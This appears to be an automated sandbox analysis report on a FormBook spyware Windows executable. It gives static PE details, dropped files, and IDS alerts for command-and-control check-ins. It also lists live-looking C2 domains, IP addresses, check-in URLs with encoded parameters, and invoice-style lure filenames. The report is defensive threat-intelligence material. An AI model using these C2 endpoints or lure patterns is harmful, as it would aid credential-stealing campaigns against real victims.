                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:14
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:PGK60fNNCZ.exe
                                                          renamed because original name is a hash value
                                                          Original Sample Name:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.spyw.evad.winEXE@11/2@5/4
                                                          EGA Information:
                                                          • Successful, ratio: 75%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 161
                                                          • Number of non-executed functions: 281
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 2.23.242.162, 20.109.210.53
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          22:05:20API Interceptor1x Sleep call for process: PGK60fNNCZ.exe modified
                                                          23:57:10API Interceptor191531x Sleep call for process: cacls.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          13.248.169.4802Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • www.remedies.pro/a42x/
                                                          zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • www.aktmarket.xyz/wb7v/
                                                          SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                          • www.sfantulandrei.info/wvsm/
                                                          suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • www.optimismbank.xyz/98j3/
                                                          e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                          • www.shipley.group/wfhx/
                                                          gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                          • www.autonomousoid.pro/m1if/
                                                          fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                          • www.bcg.services/5onp/
                                                          aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                          • www.fortevision.xyz/dash/
                                                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • www.sfantulandrei.info/wvsm/
                                                          84.32.84.32zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • www.techmiseajour.net/jytl/
                                                          5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                          • www.athanasopoulos.xyz/c3ib/?0lTTc=VeVTu/fHsmAIsnghWeASOCbVs5MMPZeLEFuxWqcNIO4v3qxzm9KoM8zNhlg+xGg6CPSRvT5qIZglpWcl4xCUdeIDLz6/vwrtfjRi1ZSt7jG1PChEqw==&LR=KBvPk
                                                          hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                          • www.sido247.pro/073p/?GF=mlOXG&IJQ=NsdLHLYUe9sblrm3UOGRvC4p7TYTQZr/4RSieCn+7DwPKByw7jhxCyN0LTJMQHRDPlmDRdKjKllFY9ccUXh84wh4P+Mkk2rH6R5Xw9P/6Vdw6OeNADfEYyY=
                                                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                          • www.appsolucao.shop/qt4m/
                                                          ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                          • www.absseguridad.online/3io6/
                                                          zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                          • www.absseguridad.online/vekd/
                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                          • www.promocao.info/zaz4/
                                                          Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                                          • www.nosolofichas.online/hqr6/
                                                          Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                          • www.nosolofichas.online/hqr6/
                                                          inv#12180.exeGet hashmaliciousFormBookBrowse
                                                          • www.promocao.info/zaz4/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          www.aktmarket.xyzzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          purchase order.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          attached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 13.248.169.48
                                                          Fi#U015f.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          VSP469620.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          www.golivenow.livezAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          purchase order.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          attached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 66.29.149.46
                                                          ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 66.29.149.46
                                                          www.christinascuties.netzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156
                                                          profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156
                                                          purchase order.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156
                                                          attached invoice.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156
                                                          attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • 74.208.236.156
                                                          file.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          NTT-LT-ASLTzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          ofZiNLLKZU.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          armv5l.elfGet hashmaliciousUnknownBrowse
                                                          • 84.32.26.92
                                                          DHL DOCS 2-0106-25.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                                          • 84.32.84.32
                                                          UpdaterTool.exeGet hashmaliciousUnknownBrowse
                                                          • 84.32.84.152
                                                          ONEANDONE-ASBrauerstrasse48DEzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 74.208.236.156
                                                          hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                          • 217.160.0.183
                                                          gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                          • 217.160.0.113
                                                          NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                          • 77.68.64.45
                                                          https://media.maxfs.de/Get hashmaliciousUnknownBrowse
                                                          • 212.227.100.139
                                                          miori.arm5.elfGet hashmaliciousUnknownBrowse
                                                          • 217.174.247.149
                                                          Onedrive Shared document.htmlGet hashmaliciousHTMLPhisherBrowse
                                                          • 77.68.14.124
                                                          rHP_SCAN_DOCUME.exeGet hashmaliciousFormBookBrowse
                                                          • 217.160.0.160
                                                          https://www.boulderpeptide.org/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                          • 74.208.236.22
                                                          https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                          • 212.227.149.251
                                                          ADVANTAGECOMUSzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.146.78
                                                          YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 66.29.146.57
                                                          EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          7DpzcPcsTS.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 66.29.159.53
                                                          DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.132.194
                                                          BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                          • 66.29.149.46
                                                          https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                          • 66.29.153.55
                                                          AMAZON-02US02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 76.223.54.146
                                                          zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                          • 13.228.81.39
                                                          suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          5.elfGet hashmaliciousUnknownBrowse
                                                          • 157.175.218.227
                                                          BzK8rQh2O3.exeGet hashmaliciousFormBookBrowse
                                                          • 18.141.10.107
                                                          k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                          • 18.163.74.139
                                                          e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                          • 13.248.169.48
                                                          XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                          • 18.163.74.139

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PGK60fNNCZ.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\PGK60fNNCZ.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Temp\t577G2K6

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\cacls.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:modified
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1215420383712111
                                                          Encrypted:false
                                                          SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                          MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                          SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                          SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                          SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.785745199704202
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:PGK60fNNCZ.exe
                                                          File size:763'904 bytes
                                                          MD5:be729fe26e81cb5d5ab76fa5a235accb
                                                          SHA1:30c08240bae5fe587671eb22edb703e6da07e909
                                                          SHA256:daae3c4404ba8fc0f82790b718f5a4b13f49e2e5388471fe72da8c8eba5de290
                                                          SHA512:d9cd216369869b9a0d53ee8736fd6a7b4de64a8c9fbe6ca05bdc3cfd741d8cbdede0be3d4489fff63652142ffdce4cd9618a08a24453a7e7d7497823bfc64cff
                                                          SSDEEP:12288:I7IWMXthxZxK0M6eUsBG6r9rh11Hc0zdPXOVxcLTNMzQuMgoh1XuDMq/SK:yIR5KX6TstV11HlzFXGeLTNw6fhtuD5/
                                                          TLSH:A5F402286586D816D94267741EB0F2B826BCAEDDE401D31A5FE97DDFBC76F058C80382
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg..............0...... ........... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:0697f0b9b0b1d827

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4ba512
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x67509BAD [Wed Dec 4 18:13:01 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          push ebx
                                                          add byte ptr [ecx+00h], bh
                                                          jnc 00007F3FFCB70AB2h
                                                          je 00007F3FFCB70AB2h
                                                          add byte ptr [ebp+00h], ch
                                                          add byte ptr [ecx+00h], al
                                                          arpl word ptr [eax], ax
                                                          je 00007F3FFCB70AB2h
                                                          imul eax, dword ptr [eax], 00610076h
                                                          je 00007F3FFCB70AB2h
                                                          outsd
                                                          add byte ptr [edx+00h], dh
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xba4c00x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x1de4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xb85380xb86002eb65f3bf15453efd22a48a542921ca1False0.9240426377118645data7.791656574415995IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xbc0000x1de40x1e00cbbfc11dc2ca213cfde301b4022180a4False0.8514322916666667data7.387247569285317IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xbe0000xc0x200b4d73b1260091103d6e50e962bf84d72False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xbc1000x174ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9639624539054643
                                                          RT_GROUP_ICON0xbd8600x14data1.05
                                                          RT_VERSION0xbd8840x360data0.42476851851851855
                                                          RT_MANIFEST0xbdbf40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-11T04:06:30.782095+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75132074.208.236.15680TCP
                                                          2025-01-11T04:06:54.258368+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75132484.32.84.3280TCP
                                                          2025-01-11T04:07:07.423091+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75132813.248.169.4880TCP
                                                          2025-01-11T04:07:20.828709+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.75133266.29.149.4680TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 11, 2025 04:05:43.091525078 CET5118253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:05:43.096400023 CET53511821.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:05:43.096529007 CET5118253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:05:43.101387978 CET53511821.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:05:43.562294006 CET5118253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:05:43.567548037 CET53511821.1.1.1192.168.2.7
                                                          Jan 11, 2025 04:05:43.567653894 CET5118253192.168.2.71.1.1.1
                                                          Jan 11, 2025 04:06:30.251188040 CET5132080192.168.2.774.208.236.156
                                                          Jan 11, 2025 04:06:30.256016016 CET805132074.208.236.156192.168.2.7
                                                          Jan 11, 2025 04:06:30.256112099 CET5132080192.168.2.774.208.236.156
                                                          Jan 11, 2025 04:06:30.266010046 CET5132080192.168.2.774.208.236.156
                                                          Jan 11, 2025 04:06:30.270822048 CET805132074.208.236.156192.168.2.7
                                                          Jan 11, 2025 04:06:30.780997038 CET805132074.208.236.156192.168.2.7
                                                          Jan 11, 2025 04:06:30.782047987 CET805132074.208.236.156192.168.2.7
                                                          Jan 11, 2025 04:06:30.782094955 CET5132080192.168.2.774.208.236.156
                                                          Jan 11, 2025 04:06:30.785651922 CET5132080192.168.2.774.208.236.156
                                                          Jan 11, 2025 04:06:30.790505886 CET805132074.208.236.156192.168.2.7
                                                          Jan 11, 2025 04:06:46.130215883 CET5132180192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:46.135061979 CET805132184.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:46.135140896 CET5132180192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:46.156256914 CET5132180192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:46.161083937 CET805132184.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:46.588838100 CET805132184.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:46.588960886 CET5132180192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:47.662817001 CET5132180192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:47.667784929 CET805132184.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:48.681351900 CET5132280192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:48.686258078 CET805132284.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:48.686358929 CET5132280192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:48.700236082 CET5132280192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:48.705666065 CET805132284.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:49.142142057 CET805132284.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:49.142210960 CET5132280192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:50.210010052 CET5132280192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:50.214958906 CET805132284.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:51.228493929 CET5132380192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:51.233388901 CET805132384.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:51.233480930 CET5132380192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:51.249531031 CET5132380192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:51.254430056 CET805132384.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:51.254530907 CET805132384.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:51.828357935 CET805132384.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:51.828454018 CET5132380192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:52.756690979 CET5132380192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:52.761668921 CET805132384.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:53.776326895 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:53.781343937 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:53.781660080 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:53.790595055 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:53.795455933 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258259058 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258280993 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258294106 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258346081 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258368015 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.258476019 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.258827925 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258872032 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258883953 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.258922100 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.259021044 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.259033918 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.259051085 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:54.259056091 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.259109020 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.263226986 CET5132480192.168.2.784.32.84.32
                                                          Jan 11, 2025 04:06:54.268091917 CET805132484.32.84.32192.168.2.7
                                                          Jan 11, 2025 04:06:59.290488005 CET5132580192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:06:59.295329094 CET805132513.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:06:59.295403957 CET5132580192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:06:59.310039043 CET5132580192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:06:59.314867973 CET805132513.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:06:59.772159100 CET805132513.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:06:59.772250891 CET805132513.248.169.48192.168.2.7
                                                          Jan 11, 2025 04:06:59.772326946 CET5132580192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:00.819179058 CET5132580192.168.2.713.248.169.48
                                                          Jan 11, 2025 04:07:01.837691069 CET5132680192.168.2.713.248.169.48
